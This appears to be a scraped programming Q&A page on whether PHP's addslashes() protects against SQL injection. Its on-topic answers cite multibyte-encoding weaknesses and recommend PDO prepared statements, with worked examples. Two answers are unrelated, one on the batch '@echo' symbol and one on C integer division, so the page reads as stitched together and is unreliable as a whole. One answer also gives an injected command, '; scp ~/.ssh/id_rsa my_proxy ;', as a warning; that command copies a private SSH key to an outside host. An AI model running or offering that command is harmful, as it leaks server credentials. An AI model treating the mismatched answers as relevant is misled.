Asked 2 years ago · Answers: 5 · Viewed 65 times

Why do we need DB-specific functions like mysql_real_escape_string()? What can they do that addslashes() doesn't?

Ignoring for the moment the superior alternative of parameterized queries, is a webapp that uses addslashes() exclusively still vulnerable to SQL injection, and if yes, how?

 Answers

4

Addslashes is generally not good enough when dealing with multibyte encoded strings.

Saturday, October 1, 2022
1

At symbol - @

The @ symbol tells the command processor to be less verbose: to show only the output of the command, without showing the command itself being executed or any prompts associated with the execution. When used, it is prepended to the beginning of the command; it is not necessary to leave a space between the "@" and the command.

When "echo" is set to "off" it is not necessary to use "@" because setting "echo" to "off" causes this behavior to become automatic. "Echo" is usually set to "on" by default when the execution of a script begins. This is the reason "@echo off" is commonly used, to turn echo off without displaying the act of turning it off.

echo verbose
@echo less verbose
pause
Wednesday, October 26, 2022
 
robd
 
4

My recommendations:

  1. ditch mysqli in favor of PDO (with mysql driver)
  2. use PDO parameterized prepared statements

You can then do something like:

// PDO_MYSQL DSN keys are host= and dbname= (not server=); charset= makes the
// connection encoding explicit so any client-side quoting matches the server's.
$pdo_obj = new PDO( 'mysql:host=localhost;dbname=mydatabase;charset=utf8mb4',
                    $dbusername, $dbpassword );

// The SQL text is fixed; the value is supplied separately as a named parameter.
$sql = 'SELECT column FROM table WHERE condition=:condition';
$params = array( ':condition' => 1 );

$statement = $pdo_obj->prepare( $sql,
    array( PDO::ATTR_CURSOR => PDO::CURSOR_FWDONLY ) );
$statement->execute( $params );
$result = $statement->fetchAll( PDO::FETCH_ASSOC );

PROs:

  1. No more manual escaping since PDO does it all for you!
  2. It's relatively easy to switch database backends all of a sudden.

CONs:

  • I cannot think of any.
Thursday, September 8, 2022
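As an added example (not code from the answer above), here is the same PDO approach with the connection options a practitioner would actually set, next to the addslashes()-based string splicing the question asks about. It assumes a reachable MySQL server, a database "mydatabase" with a "users" table, user "app" and a password read from the environment variable APP_DB_PASSWORD; all of these are placeholders.

```php
<?php
// Added example, not from the original answer. Host, database, user, table
// and the APP_DB_PASSWORD variable are assumed placeholders.
declare(strict_types=1);

function connectMysql(): PDO
{
    // charset=utf8mb4 makes the connection charset explicit, so whatever
    // quoting PDO performs client-side uses the encoding the server decodes with.
    $dsn = 'mysql:host=127.0.0.1;dbname=mydatabase;charset=utf8mb4';
    $password = getenv('APP_DB_PASSWORD') ?: '';
    return new PDO($dsn, 'app', $password, [
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION, // fail loudly, never silently
        PDO::ATTR_EMULATE_PREPARES   => false, // server-side prepare: values travel apart from SQL
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ]);
}

// Weak form: the user-controlled value is spliced into the SQL text.
// addslashes() works byte by byte and knows nothing about the connection
// charset, which is the gap the first answer points at.
function findUsersUnsafe(PDO $pdo, string $name): array
{
    $sql = "SELECT id, name FROM users WHERE name = '" . addslashes($name) . "'";
    return $pdo->query($sql)->fetchAll();
}

// Hardened form: the SQL text never changes; the value is bound as a
// parameter and cannot alter the statement's structure.
function findUsers(PDO $pdo, string $name): array
{
    $stmt = $pdo->prepare('SELECT id, name FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll();
}

// A name containing a quote is handled correctly without any manual escaping.
$pdo = connectMysql();
foreach (findUsers($pdo, "O'Brien") as $row) {
    echo $row['id'], ' ', $row['name'], PHP_EOL;
}
```

With ATTR_EMULATE_PREPARES left at its default (true), PDO quotes the bound values itself before sending the query; it does so using the connection charset, which is why the charset belongs in the DSN rather than in a later SET NAMES query. Setting it to false removes client-side quoting from the picture entirely.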
 
2

Common practice for customer-facing applications is to have an API-endpoint for each database query, which will require user authentication. The API server will then validate the input while formatting the query.

Directly exposing bash on the server is never a good idea. Besides SQL injection, other much worse situations, like ; scp ~/.ssh/id_rsa my_proxy ;, can easily happen.


It appears that security is not OP's primary concern based on the comments below. Rather, the main focus is generating valid queries.

For that, the simplest solution is to perhaps use existing libraries, and let them handle the formatting. For example, in Python there is

https://dev.mysql.com/doc/connector-python/en/

Usually insertion should be done in batch for efficiency. But if preferred, you can write a script for inserting a row like

python3 tableX_insert.py --field1 value1 --field2 value2

I am sure in other languages similar modules for DB conn and cursor exist. Any effort to do the same with raw bash command line is re-inventing wheels.

Friday, August 19, 2022
 
1

If you don't have the cast the following happens (if number is 34).

  1. Using integer arithmetic, number/10 is number/10 rounded down, i.e. 3.
  2. ceil(3) = 3
  3. 3*10 = 30

If you have the cast, the following happens:

  1. (double)number = 34.0
  2. 34.0 / 10 = 3.4
  3. ceil(3.4) = 4.0
  4. 4.0*10 = 40

The important thing to realise is that integer division always rounds towards 0.

Sunday, October 30, 2022
 